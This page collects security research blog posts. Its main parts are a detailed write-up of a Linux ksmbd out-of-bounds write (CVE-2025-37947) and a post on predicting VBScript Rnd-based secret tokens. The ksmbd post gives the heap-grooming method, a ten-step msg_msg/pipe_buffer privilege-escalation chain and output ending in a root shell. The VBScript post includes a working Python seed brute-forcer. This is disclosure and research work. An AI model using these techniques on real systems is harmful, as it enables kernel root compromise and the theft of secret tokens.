"ID" -> "123"
ENUM -> First value

Usability and Performance Improvements

We also implemented various usability and performance improvements. These changes include:

Search inside the InQL Scanner tab, and in the Repeater/Intruder
Improved POI Regex matching
Improved caching for better performance
Added a delayed POI and cycle detection to improve the schema parsing speed
Various bugs and UI fixes

Join the InQL Community (And Get Swag!)

InQL is an open-source project, and we welcome every contribution. We want to take this opportunity to thank the community for all the support, bug reports, and feedback we’ve received so far!

With this new release, we’re excited to announce a new initiative to reward contributors. To show our appreciation, we’ll be sending exclusive Doyensec swag and/or gift cards to community members who fix issues or create new features.

To make contributing easy, make sure to read the project’s README.md file and review the existing issues on GitHub. We encourage you to start with tasks labeled Good First Issue or Help Wanted.

Some of the good first issues we would like to see your contribution for:

If you have an idea for a new feature or have found a bug, please open a new issue to discuss it before you start building. This helps everyone get on the same page.

We can’t wait to see your pull requests!

Conclusion

As we’ve mentioned, we are extremely excited about this new release and the direction InQL is heading. We hope to see more contributions from the ever-growing cybersecurity community and can’t wait to see what the future brings!

Remember to update to the latest version and check out our InQL page on GitHub.

Happy Hacking!

ksmbd - Exploiting CVE-2025-37947 (3/3)

2025-10-08T00:00:00+02:00

Introduction

This is the last of our posts about ksmbd. For the previous posts, see part1 and part2.

Considering all discovered bugs and proof-of-concept exploits we reported, we had to select some suitable candidates for exploitation. In particular, we wanted to use something reported more recently to avoid downgrading our working environment.

We first experimented with several use-after-free (UAF) bugs, since this class of bugs has a reputation for almost always being exploitable, as proven in numerous articles. However, many of them required race conditions and specific timing, so we postponed them in favor of bugs with more reliable or deterministic exploitation paths.

Then there were bugs that depended on factors outside user control, or that had peculiar behavior. Let’s first look at CVE-2025-22041, which we initially intended to use. Due to missing locking, it’s possible to invoke the ksmbd_free_user function twice:

void ksmbd_free_user(struct ksmbd_user *user)
{
	ksmbd_ipc_logout_request(user->name, user->flags);
	kfree(user->name);
	kfree(user->passkey);
	kfree(user);
}

In this double-free scenario, an attacker has to replace user->name with another object, so it can be freed the second time. The problem is that the kmalloc cache size depends on the size of the username. If it is slightly longer than 8 characters, it will fit into kmalloc-16 instead of kmalloc-8, which means different exploitation techniques are required, depending on the username length.

Hence we decided to take a look at CVE-2025-37947, which seemed promising from the start. We considered remote exploitation by combining the bug with an infoleak, but we lacked a primitive such as a writeleak, and we were not aware of any such bug having been reported in the last year. Even so, as mentioned, we restricted ourselves to bugs we had discovered.

This bug alone appeared to offer the capabilities we needed to bypass common mitigations (e.g., KASLR, SMAP, SMEP, and several Ubuntu kernel hardening options such as HARDENED_USERCOPY). So, due to additional time constraints, we ended up focusing on a local privilege escalation only. Note that at the time of writing this post, we implemented the exploit on Ubuntu 22.04.5 LTS with the latest kernel (5.15.0-153-generic) that was still vulnerable.

Root cause analysis

The finding requires the stream_xattr module to be enabled in the vfs objects configuration option and can be triggered by an authenticated user. In addition, a writable share must be added to the default configuration as follows:

[share]
        path = /share
        vfs objects = streams_xattr
        writeable = yes

Here is the vulnerable code, with a few unrelated lines removed that do not affect the bug’s logic:

// https://elixir.bootlin.com/linux/v5.15/source/fs/ksmbd/vfs.c#L411

static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
				  size_t count)
{
    char *stream_buf = NULL, *wbuf;
    struct mnt_idmap *idmap = file_mnt_idmap(fp->filp);
    size_t size;
    ssize_t v_len;
    int err = 0;
    
    ksmbd_debug(VFS, "write stream data pos : %llu, count : %zd\n",
        *pos, count);

    size = *pos + count;
    if (size > XATTR_SIZE_MAX) { // [1]
        size = XATTR_SIZE_MAX;
        count = (*pos + count) - XATTR_SIZE_MAX;
	}

    wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO); // [2]
    stream_buf = wbuf;

    memcpy(&stream_buf[*pos], buf, count); // [3]

    // .. snip 

    if (err < 0)
        goto out;

    fp->filp->f_pos = *pos;
    err = 0;
out:
    kvfree(stream_buf);
    return err;
}

The size of the extended attribute value XATTR_SIZE_MAX is 65536, or 16 pages (0x10000), assuming a common page size of 0x1000 bytes. We can see at [1] that if the count and the position surpass this value, the size is truncated to 0x10000, allocated at [2].

Hence, we can set the position to 0x10000, count to 0x8, and memcpy(stream_buf[0x10000], buf, 8) will write user-controlled data 8 bytes out-of-bounds at [3]. Note that we can shift the position to even control the offset, like for instance with the value 0x10010 to write at the offset 16. However, the number of bytes we copy (count) would be incremented by the value 16 too, so we end up copying 24 bytes, potentially corrupting more data. This is often not desired, depending on the alignment we can achieve.

Proof of Concept

To demonstrate that the vulnerability is reachable, we wrote a minimal proof of concept (PoC). This PoC only triggers the bug - it does not escalate privileges. Additionally, after changing the permissions of /proc/pagetypeinfo to be readable by an unprivileged user, it can be used to confirm the buffer allocation order. The PoC code authenticates using smbuser/smbpassword credentials via the libsmb2 library and uses the same socket as the connection to send the vfs stream data with user-controlled attributes.

Specifically, we set file_offset to 0x0000010018ULL and length_wr to 8, writing 32 bytes filled with 0xaa and 0xbb patterns for easy recognition.

If we run the PoC, print the allocation address, and break on memcpy, we can confirm the OOB write:

(gdb) c
Continuing.
ksmbd_vfs_stream_write+310 allocated: ffff8881056b0000

Thread 2 hit Breakpoint 2, 0xffffffffc06f4b39 in memcpy (size=32, 
    q=0xffff8881031b68fc, p=0xffff8881056c0018)
    at /build/linux-eMJpOS/linux-5.15.0/include/linux/fortify-string.h:191
warning: 191	/build/linux-eMJpOS/linux-5.15.0/include/linux/fortify-string.h: No such file or directory
(gdb) x/2xg $rsi
0xffff8881031b68fc:	0xaaaaaaaaaaaaaaaa	0xbbbbbbbbbbbbbbbb

Heap Shaping for `kvzalloc`

On Linux, physical memory is managed in pages (usually 4KB), and the page allocator (buddy allocator) organizes them in power-of-two blocks called orders. Order 0 is a single page, order 1 is 2 contiguous pages, order 2 is 4 pages, and so on. This allows the kernel to efficiently allocate and merge contiguous page blocks.

With that, we have to take a look at how exactly the memory is allocated via kvzalloc. The function is just a wrapper around kvmalloc that returns a zeroed page:

// https://elixir.bootlin.com/linux/v5.15/source/include/linux/mm.h#L811
static inline void *kvzalloc(size_t size, gfp_t flags)
{
    return kvmalloc(size, flags | __GFP_ZERO);
}

Then the function calls kvmalloc_node, attempting to allocate physically contiguous memory using kmalloc, and if that fails, it falls back to vmalloc to obtain memory that only needs to be virtually contiguous. We were not trying to create memory pressure to exploit the latter allocation mechanism, so we can assume the function behaves like kmalloc().

Since Ubuntu uses the SLUB allocator for kmalloc by default, it follows with __kmalloc_node. That utilizes allocations having order-1 pages via kmalloc_caches, since KMALLOC_MAX_CACHE_SIZE has a value 8192.

// https://elixir.bootlin.com/linux/v5.15/source/mm/slub.c#L4424
void *__kmalloc_node(size_t size, gfp_t flags, int node)
{
	struct kmem_cache *s;
	void *ret;

	if (unlikely(size > KMALLOC_MAX_CACHE_SIZE)) {
		ret = kmalloc_large_node(size, flags, node);

		trace_kmalloc_node(_RET_IP_, ret,
				   size, PAGE_SIZE << get_order(size),
				   flags, node);

		return ret;
	}

	s = kmalloc_slab(size, flags);

	if (unlikely(ZERO_OR_NULL_PTR(s)))
		return s;

	ret = slab_alloc_node(s, flags, node, _RET_IP_, size);

	trace_kmalloc_node(_RET_IP_, ret, size, s->size, flags, node);

	ret = kasan_kmalloc(s, ret, size, flags);

	return ret;
}

For anything larger, the Linux kernel gets pages directly using the page allocator:

// https://elixir.bootlin.com/linux/v5.15/source/mm/slub.c#L4407
#ifdef CONFIG_NUMA
static void *kmalloc_large_node(size_t size, gfp_t flags, int node)
{
	struct page *page;
	void *ptr = NULL;
	unsigned int order = get_order(size);

	flags |= __GFP_COMP;
	page = alloc_pages_node(node, flags, order);
	if (page) {
		ptr = page_address(page);
		mod_lruvec_page_state(page, NR_SLAB_UNRECLAIMABLE_B,
				      PAGE_SIZE << order);
	}

	return kmalloc_large_node_hook(ptr, size, flags);
}

So, since we have to request 16 pages, we are dealing with buddy allocator page shaping, and we aim to overflow memory that follows an order-4 allocation. The question is what we can place there and how to ensure proper positioning.

A key constraint is that memcpy() happens immediately after the allocation. This rules out spraying after allocation. Therefore, we must create a 16-page contiguous free space in memory in advance, so that kvzalloc() places stream_buf in that region. This way, the out-of-bounds write hits a controlled and useful target object.

There are various objects that could be allocated in kernel memory, but most common ones use kmalloc caches. So we investigated which could be a good fit, where the order value indicates the page order used for allocating slabs that hold those objects:

$ for i in /sys/kernel/slab/*/order; do \
    sudo cat $i | tr -d '\n'; echo " -> $i"; \
done | sort -rn | head 

-> /sys/kernel/slab/UDPv6/order
-> /sys/kernel/slab/UDPLITEv6/order
-> /sys/kernel/slab/TCPv6/order
-> /sys/kernel/slab/TCP/order
-> /sys/kernel/slab/task_struct/order
-> /sys/kernel/slab/sighand_cache/order
-> /sys/kernel/slab/sgpool-64/order
-> /sys/kernel/slab/sgpool-128/order
-> /sys/kernel/slab/request_queue/order
-> /sys/kernel/slab/net_namespace/order

We see that the page allocator uses order-3 pages at maximum. Based on that, our choice became kmalloc-cg-4k (not shown in output), which we can easily spray. It’s versatile for achieving various exploitation primitives, such as arbitrary read, write, or in some cases, even UAF.

After experimenting with order-3 page allocations and checking /proc/pagetypeinfo, we confirmed that there are 5 freelists per order, per zone. In our case, zone Normal is used, and GFP_KERNEL prefers the Unmovable migrate type, so we can ignore the others:

$ sudo cat /proc/pagetypeinfo 
Page block order: 9
Pages per block:  512

Free pages count per migrate type at order  0    1   2   3   4   5   6   7   8   9   10
Node  0, zone     DMA, type    Unmovable    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone     DMA, type      Movable    0    0   0   0   0   0   0   0   0   1    3
Node  0, zone     DMA, type  Reclaimable    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone     DMA, type   HighAtomic    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone     DMA, type      Isolate    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone   DMA32, type    Unmovable    0    0   0   0   0   0   0   1   0   1    0
Node  0, zone   DMA32, type      Movable    2    2   1   1   0   3   3   3   2   3  730
Node  0, zone   DMA32, type  Reclaimable    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone   DMA32, type   HighAtomic    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone   DMA32, type      Isolate    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone  Normal, type    Unmovable   69   30   7   9   3   1  30  63  37  28   36
Node  0, zone  Normal, type      Movable   37    7   3   5   5   3   5   2   2   4 1022
Node  0, zone  Normal, type  Reclaimable    3    2   1   2   1   0   0   0   0   1    0
Node  0, zone  Normal, type   HighAtomic    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone  Normal, type      Isolate    0    0   0   0   0   0   0   0   0   0    0

Number of blocks type     Unmovable      Movable  Reclaimable   HighAtomic      Isolate 
Node 0, zone      DMA            1            7            0            0            0 
Node 0, zone    DMA32            2         1526            0            0            0 
Node 0, zone   Normal          182         2362           16            0            0

The output shows 9 free elements for order-3 and 3 for order-4. By calling kvmalloc(0x10000, GFP_KERNEL | __GFP_ZERO), we can double-check that the number of order-4 elements is decremented. We can compare the state before and after the allocation:

Free pages count per migrate type at order     0    1    2   3  4  5  6   7   8   9  10
Node    0, zone   Normal, type    Unmovable  843  592  178  14  6  7  4  47  45  26  32 
Node    0, zone   Normal, type    Unmovable  843  592  178  14  5  7  4  47  45  26  32

When the allocator runs out of order-3 and order-4 blocks, it starts splitting higher-order blocks - like order-5 - to satisfy new requests. This splitting is recursive, an order-5 block becomes two order-4 blocks, one of which is then split again if needed.

In our scenario, once we exhaust all order-3 and order-4 freelist entries, the allocator pulls an order-5 block. One half is split to satisfy a lower-order allocation - our target order-3 object. The other half remains a free order-4 block and can later be used by kvzalloc for the stream_buf.

Even though this layout is not guaranteed, after repeating this several times, it gives us a relatively high probability of a scenario where the stream_buf allocation lands directly after the order-3 object, allowing us to corrupt its memory through the out-of-bounds write.

By allocating 1024 messages (msg_msg), with a message size of 4096 to fit into kmalloc-cg-4k, we obtained the following layout centered around stream_buf at 0xffff8881117b0000, where the red strip marks the target pages and the blue represents msg_msg objects:

When we zoomed in, we confirmed that it is indeed possible to place stream_buf before one of the messages:

Note that the probability of overwriting the victim object was significantly improved by receiving messages and creating holes. However, in a minority of cases - less than 10% in our results - the exploit failed.

This can occur when we overwrite different objects, depending on the state of ksmbd or external processes. Unfortunately, with some probability, this can also result in kernel panic.

Exploitation Strategy

After being able to trigger the OOB write, the local escalation becomes almost straightforward. We tried several approaches, such as corrupting the next pointer in a segmented msg_msg, described in detail here. However, using this method there was no easy way to obtain a KASLR leak, and we did not want to rely on side-channel attacks such as Retbleed. Therefore, we had to revisit our strategy.

The one from the near-canonical write-up CVE-2021-22555: Turning \x00\x00 into 10000$ was the best fit. Because we overwrote physical pages instead of Slab objects, we did not have to deal with cross-cache attacks introduced by accounting, and the post-exploitation phase required only a few modifications.

First, we confirmed the addresses of the allocation via bpf script, to ensure that the addresses are properly aligned.

$ sudo ./bpf-tracer.sh
...
$ grep 4048 out-4096.txt  | egrep ".... total" -o | sort | uniq -c
0000 total
1000 total
2000 total
3000 total
4000 total
5000 total
6000 total
7000 total
8000 total
9000 total
a000 total
b000 total
c000 total
d000 total
e000 total
f000 total

Our choice to create a collision by overwriting two less significant bytes by \x05\x00 was kind of arbitrary. After that, we just re-implemented all the stages, and we were even able to find similar ROP gadgets for stack pivoting.

We strongly recommend reading the original article to make all steps clear, as it provides the missing information which we did not want to repeat here.

With that in place, the exploit flow was the following:

Allocate many msg_msg objects in the kernel.
Trigger an OOB write in ksmbd to allocate stream_buf, and overwrite the primary message’s next pointer so two primary messages point to the same secondary message.
Detect the corrupted pair by tagging every message with its queue index and scanning queues with msgrcv(MSG_COPY) to find mismatched tags.
Free the real secondary message (from the real queue) to create a use-after-free - the fake queue still holds a stale pointer to the freed buffer.
Spray userland objects over the freed slot via UNIX sockets so we can reclaim the freed memory with controlled data by crafting a fake msg_msg.
Abuse m_ts to leak kernel memory: craft the fake msg_msg so copy_msg returns more data than intended and read adjacent headers and pointers to leak kernel heap addresses for mlist.next and mlist.prev.
With the help of an sk_buff spray, rebuild the fake msg_msg with correct mlist.next and mlist.prev so it can be unlinked and freed normally.
Spray and reclaim that UAF with struct pipe_buffer objects so we can leak anon_pipe_buf_ops and compute the kernel base to bypass KASLR.
Create a fake pipe_buf_operations structure by spraying skbuff the second time, with the release operation pointer that points into crafted gadget sequences.
Trigger the release callbacks by closing pipes - this starts the ROP chain with stack pivoting.

Final Exploit

The final exploit is available here, requiring a several attempts:

...
[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[-] Error could not corrupt any primary message.
[ ] Attempt: 3

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: 1a00
[+] real_idx: 1a08

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff8f17c6e88000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff8f17d3bb5000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa3242700
[+] kbase_addr: ffffffffa2000000
[+] leaked kslide: 21000000

[+] STAGE 4: Kernel code execution
[*] Releasing pipe_buffer objects...
[*] Returned to userland
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux target22 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux

Note that reliability could still be improved, because we did not try to find optimal values for the number of sprayed-and-freed objects used for corruption. We arrived at the values experimentally and obtained satisfactory results.

Conclusion

We successfully demonstrated the exploitability of the bug in ksmbd on the latest Ubuntu 22.04 LTS using the default configuration and enabling the ksmbd service. A full exploit to achieve local root escalation was also developed.

A flaw in ksmbd_vfs_stream_write() allows out-of-bounds writes when pos exceeds XATTR_SIZE_MAX, enabling corruption of adjacent pages with kernel objects. Local exploitation can reliably escalate privileges. Remote exploitation is considerably more challenging: an attacker would be constrained to the code paths and objects exposed by ksmbd, and a successful remote attack would additionally require an information leak to defeat KASLR and make the heap grooming reliable.

References

Yet Another Random Story: VBScript's Randomize Internals

2025-09-25T00:00:00+02:00

In one of our recent posts, Dennis shared an interesting case study of C# exploitation that rode on Random-based password-reset tokens. He demonstrated how to use the single-packet attack, or a bit of old-school math, to beat the game. Recently, I performed a security test on a target which had a dependency written in VBScript. This blog post focuses on VBS’s Rnd and shows that the situation there is even worse.

Target Application

The application was responsible for generating a secret token. The token was supposed to be unpredictable and expected to remain secret. Here’s a rough copy of the token generation code:

Dim chars, n
chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789()*&^%$#@!"
n = 32

function GenerateToken(chars, n)
	Dim result, pos, i, charsLength
	charsLength = Int(Len(chars))	
	
	For i = 1 To n
		Randomize
		pos = Int((Rnd * charsLength) + 1)
		result = result & Mid(chars, pos, 1)
	Next
	
	GenerateToken = result	
end function

The first thing I noticed was that the Randomize function was called inside a loop. That should reseed the PRNG on every single iteration, right? That could result in repeated values. Well, contrary to many other programming languages, in VBScript, the Randomize usage within a loop is not a problem per se. The function will not reset the initial state if the same seed is passed again (even if implicitly). This prevents generating identical sequences of characters within a single GenerateToken call. If you actually want that behavior, call Rnd with a negative argument immediately before calling Randomize with a numeric argument.

But if that isn’t an issue, then what is?

How VBS’s `Randomize` Works in Practice

Here’s a short API breakdown:

Randomize     ' seed the global PRNG using the system clock
Randomize s   ' seed the global PRNG using a specified seed value
r = Rnd()     ' next float in [0,1)

If no seed is explicitly specified, Randomize uses Timer to set it (not entirely true, but we will get there). Timer() returns seconds since midnight as a Single value. Rnd() advances a global PRNG state and is fully deterministic for a given seed. Same seed, same sequence, like in other programming languages.

There are some problematic parts here, though. Windows’ default system clock tick is about 15.625 ms, i.e., 64 ticks per second. In other words, we get a new implicit seed value only once every 15.625 milliseconds.

Because the returned value is of type Single, we also get precision loss compared to a Double type. In fact, multiple “seeds” round to the same internal value. Think of collisions happening internally. As a result, there are way fewer unique sequences possible than you might think!

In practice there are at most 65,536 distinct effective seedings (details below). Because Timer() resets at midnight, the same set recurs each day.

We ran a local copy of the client’s code to generate unique tokens. During almost 10,000 runs, we managed to generate only 400 unique values. The remaining tokens were duplicates. As time passed, the duplicate ratio increased.

Of course the real goal here would be to recover the original secret. We can achieve that if we know the time of day when the GenerateToken function started. The more precise the value, the less computations required. However, even if we have only a rough idea, like “minutes after midnight”, we can start at 00:00 and slowly increase our seed value by 15.625 milliseconds.

The PoC

We started by double-checking our strategy. We modified the initial code to use a command-line provided seed value. Note, the same seed is used multiple times. While in the original code, it is possible that seed value changes between the loop iterations, in practice that doesn’t happen often. We could expand our PoC to handle such scenarios as well, but we wanted to keep the code as clean as possible for the readability.

Option Explicit

If WScript.Arguments.Count < 1 Then
	WScript.Echo "VBS_Error: Requires 1 seed argument."
	WScript.Quit(1)
End If

Dim seedToTest
seedToTest = WScript.Arguments(0)
WScript.Echo "Seed: " & seedToTest

Dim chars, n
chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789()*&^%$#@!"
n = 32

WScript.Echo "Predicted token: " & GenerateToken(chars, n, seedToTest)

function GenerateToken(chars, n, seed)
	Dim result, pos, i, charsLength
	charsLength = Int(Len(chars))	
	
	For i = 1 To n
		Randomize seed
		pos = Int((Rnd * charsLength) + 1)
		result = result & Mid(chars, pos, 1)
	Next
	
	GenerateToken = result	
end function

We took a precise Timer() value from another piece of code and used it as an input seed. Strangely though, it wasn’t working. For some reason we were ending up with a completely different PRNG state. It took a while before we understood that Randomize and Randomize Timer() aren’t exactly the same things.

VBScript was introduced by Microsoft in the mid-1990s as a lightweight, interpreted subset of Visual Basic. As of Windows 11 version 24H2, VBScript is a Feature on Demand (FOD). That means it is installed by default for now, but Microsoft plans to disable it in future versions and ultimately remove it. Still, the method of interest is implemented within the vbscript.dll library and we can take a look at vbscript!VbsRandomize:

; edi = argc
vbscript!VbsRandomize+0x50:
00007ffc`12d076a0 85ff            test    edi,edi            ; is argc == 0 ?
00007ffc`12d076a2 755b            jne     vbscript!VbsRandomize+0xaf ; if not zero, goto Randomize <seed> path

; otherwise, seed taken from current time
00007ffc`12d076a4 488d4c2420      lea     rcx,[rsp+20h]
00007ffc`12d076a9 48ff15...       call    GetLocalTime

; build "seconds" = hh*3600 + mm*60 + ss
00007ffc`12d076b5 0fb7442428      movzx   eax,word ptr [rsp+28h]
00007ffc`12d076ba 6bc83c          imul    ecx,eax,3Ch
00007ffc`12d076bd 0fb744242a      movzx   eax,word ptr [rsp+2Ah]
00007ffc`12d076c2 03c8            add     ecx,eax  
00007ffc`12d076c4 0fb744242c      movzx   eax,word ptr [rsp+2Ch]
00007ffc`12d076c9 6bd13c          imul    edx,ecx,3Ch
00007ffc`12d076cc 03d0            add     edx,eax

; convert milliseconds to double, divide by 1000.0
00007ffc`12d076ce 0fb744242e      movzx   eax,word ptr [rsp+2Eh]
00007ffc`12d076d3 660f6ec0        movd    xmm0,eax
00007ffc`12d076d7 f30fe6c0        cvtdq2pd xmm0,xmm0
00007ffc`12d076db 660f6eca        movd    xmm1,edx
00007ffc`12d076df f20f5e0599...   divsd   xmm0,[vbscript!_real]
00007ffc`12d076e7 f30fe6c9        cvtdq2pd xmm1,xmm1
00007ffc`12d076eb f20f58c8        addsd   xmm1,xmm0

; narrow down
00007ffc`12d076ef 660f5ac1        cvtpd2ps xmm0,xmm1         ; double -> float conversion
00007ffc`12d076f3 f30f11442420    movss   [rsp+20h],xmm0     ; spill float
00007ffc`12d076f9 8b4c2420        mov     ecx,[rsp+20h]      ; load as int bits

; ecx now holds 32-bit seed candidate

...

; code used later (in both cases) to mix into PRNG state
vbscript!VbsRandomize+0xda:
00007ffc`12d0772a 816350ff0000ff      and     dword [rbx+50h],0FF0000FFh  ; keep top/bottom byte
00007ffc`12d07731 8bc1                mov     eax,ecx
00007ffc`12d07733 c1e808              shr     eax,8
00007ffc`12d07736 c1e108              shl     ecx,8
00007ffc`12d07739 33c1                xor     eax,ecx
00007ffc`12d0773b 2500ffff00          and     eax,00FFFF00h
00007ffc`12d07740 094350              or      dword [rbx+50h],eax    

When we previously said that a bare Randomize uses Timer() as a seed, we weren’t exactly right. In reality, it’s just a call to WinApi’s GetLocalTime. It computes seconds plus fractional milliseconds as Doubles, then narrows to Single (float) using the CVTPD2PS assembly instruction.

Let’s use 65860.48 as an example. It can be represented as 0x40f014479db22d0e in hex notation. After all this math is performed, our 0x40f014479db22d0e becomes 0x4780a23d and is used as the seed input.

This is what happens otherwise, when the input is explicitly given:

; argc == 1, seed given
vbscript!VbsRandomize+0xaf:
00007ffc`12d076ff 33d2                xor     edx,edx
00007ffc`12d07701 488bce              mov     rcx,rsi
00007ffc`12d07704 e8...               call    vbscript!VAR::PvarGetVarVal
00007ffc`12d07709 ba05000000          mov     edx,5
00007ffc`12d0770e 488bc8              mov     rcx,rax              ; rcx = VAR* (value)
00007ffc`12d07711 e8...               call    vbscript!VAR::PvarConvert

00007ffc`12d07716 f20f104008          movsd   xmm0,mmword [rax+8]  ; load the double payload
00007ffc`12d0771b f20f11442420        movsd   [rsp+20h],xmm0       ; spill as 64-bit
00007ffc`12d07721 488b4c2420          mov     rcx,qword  [rsp+20h] ; rcx = raw IEEE-754 bits
00007ffc`12d07726 48c1e920            shr     rcx,20h              ; **take high dword** as seed source

When we do specify the seed value, it’s processed in an entirely different way. Instead of being converted using the CVTPD2PS opcode, it’s shifted right by 32 bits. So this time, our 0x40f014479db22d0e becomes 0x40f01447 instead. We end up with completely different seed input. This explains why we couldn’t properly reseed the PRNG.

Finally, the middle two bytes of the internal PRNG state are updated with a byte-swapped XOR mix of those bits, while the top and bottom bytes of the state are preserved.

Honestly, I was thinking about reimplementing all of that to Python to get a clearer view on what was going on. But then, Python reminded me that it can handle almost infinite numbers (at least integers). On the other hand, VBScript implementation is actually full of potential number overflows that Python just doesn’t generate. Therefore, I kept the token-generation code as it was and implemented only the seed-conversion in Python.

"""
Convert the time range given on the command line into all VBS-Timer()
values between them (inclusive) in **0.015625-second** steps (1/64 s),
turn each value into the special Double that `Randomize <seed>` expects,
feed the seed to VBS_PATH, parse the predicted token, and test it.

usage
    python brute_timer.py <start_clock> <end_clock>

examples
    python brute_timer.py "12:58:00 PM" "12:58:05 PM"
    python brute_timer.py "17:42:25.50" "17:42:27.00"

Both 12- and 24-hour clock strings are accepted; optional fractional
seconds are allowed.
"""

import subprocess
import struct
import sys
import re
from datetime import datetime


VBS_PATH    = r"C:\share\poc.vbs"

TICK       = 1 / 64               # 0.015 625 s  (VBS Timer resolution)
STEP       = TICK

def vbs_timer_value(clock_text: str) -> float:
    """Clock string to exact Single value returned by VBS's Timer()."""
    for fmt in ("%I:%M:%S %p", "%I:%M:%S.%f %p",
                "%H:%M:%S", "%H:%M:%S.%f"):
        try:
            t = datetime.strptime(clock_text, fmt).time()
            break
        except ValueError:
            continue
    else:
        raise ValueError("time format not recognised: " + clock_text)

    secs = t.hour*3600 + t.minute*60 + t.second + t.microsecond/1e6
    secs = round(secs / TICK) * TICK          # snap to nearest 1/64 s
    
    # force Single precision (float32) to match VBS mantissa exactly
    secs = struct.unpack('<f', struct.pack('<f', secs))[0]
    return secs


def make_manual_seed(timer_value: float) -> float:
    """Build the Double that Randomize <seed> receives"""
    single_le = struct.pack('<f', timer_value)   # 4 bytes  little-endian
    dbl_le    = b"\x00\x00\x00\x00" + single_le  # low dword zero, high dword = f32
    return struct.unpack('<d', dbl_le)[0]        # Python float (Double)

# ---------------------------------------------------------------------------
#   MAIN ROUTINE
# ---------------------------------------------------------------------------

def main():
    if len(sys.argv) != 3:
        print(__doc__)
        sys.exit(1)

    start_val = vbs_timer_value(sys.argv[1])
    end_val   = vbs_timer_value(sys.argv[2])

    if end_val < start_val:
        print("[ERROR] end time is earlier than start time")
        sys.exit(1)

    tried_tokens    = set()
    unique_tested   = 0
    success         = False

    print(f"[INFO] Range {start_val:.5f} to {end_val:.5f} in {STEP}-s steps")

    value = start_val
    while value <= end_val + 1e-7:          # small epsilon for fp rounding
        seed = make_manual_seed(value)
        try:
            vbs = subprocess.run([
                "cscript.exe", "//nologo", VBS_PATH, str(seed)
            ], capture_output=True, text=True, check=True)
        except subprocess.CalledProcessError as e:
            print(f"[ERROR] VBS failed for seed {seed}: {e}")
            value += STEP
            continue

        m = re.search(r"Predicted token:\s*(.+)", vbs.stdout)
        if not m:
            print(f"[{value:.5f}] No token from VBS")
            value += STEP
            continue

        token = m.group(1).strip()
        if token in tried_tokens:
            value += STEP
            # print(f"Duplicate for [{value:.5f}] / seed: {seed}: {token}")
            continue
        tried_tokens.add(token)
        unique_tested += 1
        print(f"[{value:.5f}] Test #{unique_tested}: {token} // calculated seed: {seed}")
        
        # ...logic omitted - but we need some sort of token verification here

        value += STEP

if __name__ == "__main__":
    main()

The Attack

Now, we can run the base code and capture a semi-precise current time value. Our Python works with properly formatted strings, so we can convert the number using a simple method:

Dim t, hh, mm, ss, ns
t = Timer()

hh = Int(t \ 3600)
mm = Int((t Mod 3600) \ 60)
ss = Int(t Mod 60)
ns = (t - Int(t)) * 1000000

WScript.Echo _
    Right("0" & hh, 2) & ":" & _
    Right("0" & mm, 2) & ":" & _
    Right("0" & ss, 2) & "." & _
    Right("000000" & CStr(Int(ns)), 6)

Let’s say the token was generated precisely at 17:55:54.046875 and we got the QK^XJ#QeGG8pHm3DxC28YHE%VQwGowr7 string. In the case of our target, we knew that some files were created at 17:55:54, which was rather close to the token-generation time. In other cases, the information leak could come from some resource creation metadata, entries in the log file, etc.

We iterate time seeds in 0.015625-second steps (64 Hz) across the suspected window and we filter all duplicates.

We started our brute_timer.py script with a 1s range and we successfully recovered the secret in the 4th iteration:

PS C:\share> python3 .\brute_timer.py 17:55:54 17:55:55
[INFO] Range 64554.00000 to 64555.00000 in 0.015625-s steps
[64554.00000] Test #1: eYIkXKdsUTC3Uz#R)P$BlVRJie9U2(4B // calculated seed: 2.3397787718772567e+36
[64554.01562] Test #2: ZTDgSGZnPP#yQv*M6L)#hQNEdZ5Px50$ // calculated seed: 2.3397838424796576e+36
[64554.03125] Test #3: VP!bOBUjLK&uLq8I2G7*cMIAZV0Lt1v* // calculated seed: 2.3397889130820585e+36
[64554.04688] Test #4: QK^XJ#QeGG8pHm3DxC28YHE%VQwGowr7 // calculated seed: 2.3397939836844594e+36
[...snip...]

VBScript’s Randomize and Rnd are fine if you just want to roll some dice on screen, but don’t even think about using them for secrets.

ksmbd - Fuzzing Improvements and Vulnerability Discovery (2/3)

2025-09-02T00:00:00+02:00

Introduction

This is a follow-up to the article originally published here.

Our initial research uncovered several unauthenticated bugs, but we had only touched the attack surface lightly. Even after patching the code to bypass authentication, most interesting operations required interacting with handlers and state we initially omitted. In this part, we explain how we increased coverage and applied different fuzzing strategies to identify more bugs.

Some functionalities require additional configuration options. We tried to enable many available features to maximize the exposed attack surface. This helped us trigger code paths that are disabled in the minimalistic configuration example. However, to simplify our setup, we did not consider features like Kerberos support or RDMA. These could be targets for further improvement.

Configuration-Dependent Attack Surface

The following functionalities helped expand the attack surface. Only oplocks are enabled by default.

G = Global scope only
S = Per-share, but can also be set globally as a default

durable handles (G)
oplocks (S)
server multi channel support (G)
